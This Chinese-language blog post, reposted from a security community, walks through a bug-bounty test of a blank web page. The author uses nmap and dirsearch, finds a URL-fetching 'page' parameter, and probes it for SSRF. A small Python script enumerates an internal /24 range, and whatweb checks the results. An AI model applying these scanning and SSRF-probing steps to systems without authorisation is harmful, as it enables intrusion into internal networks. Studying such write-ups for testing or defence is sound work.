空白页面第二种利用

这个页面也是src的,简单打个码,刚开始访问是这个样子滴
图片[1]-空白页面第二种利用-安全小天地
我记得我上一篇文章说了xray联动,那这篇就不说了,简单的探测一下,比如nmap,发现这个只有22跟80开放
图片[2]-空白页面第二种利用-安全小天地
那没办法,跑一手目录看看,看看能发现神马,dirsearch -u “http://x.x.x.x/” –exclude-status=500,403 -e *
图片[3]-空白页面第二种利用-安全小天地
发现有一个P路径,哈哈哈哈p路径 有意思
图片[4]-空白页面第二种利用-安全小天地
访问之后发现是这个样子滴,因为上面写了内网IP所以简单的测试一下是不是存在SSRF,抓包,发现该数据包中链接是这样的http://x.x.x.x/p/index.php?page=https%3A%2F%2Fwww.baidu.com%2F
整一个简单的小脚本,跑整个C段的IP
def run():
for i in range(0,256):
print ‘http://x.x.x.x/p/index.php?page=10.155.140.’ + str(i)
if name == ‘main‘:
run()
python poc.py >> ip.txt
cat ip.txt
肯定有人会问,那怎么判断是不是SSRF读取到内网信息呢,直接用whatweb -i ip.txt判断title不就行了
图片[5]-空白页面第二种利用-安全小天地
看图好像没有办法证明读到了东西,那我们继续,大家可能也遇到过收集子域名会拿到很多内网IP,这时候IP就出现了作用,我们拿收集到的内网IP验证。
其实还有别的办法,比如看一看这个页面会不会走我们本地路由,我本地是有一个路由器的,直接访问路由是这个样子的
图片[6]-空白页面第二种利用-安全小天地
然后再使用ssrf去读取我们本地路由,http://x.x.x.x/p/index.php?page=http://192.168.50.1,页面读取不到是不是就证明了他不走本地而走的内网呢
图片[7]-空白页面第二种利用-安全小天地
这个问题,师傅们来讨论一下吧

文字来源于- 火线 Zone-云安全社区,安全小天地只做文章分享,如有侵权,请联系站长删除


「渗透云记」公众号里主要记录我每天的所思所想,我会坚持更新质量不错的文章,感兴趣的小伙伴可以扫描下方二维码,谢谢支持! 安全小天地 - 公众号 - 渗透云记
© 版权声明
THE END
喜欢就支持一下吧
点赞5 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容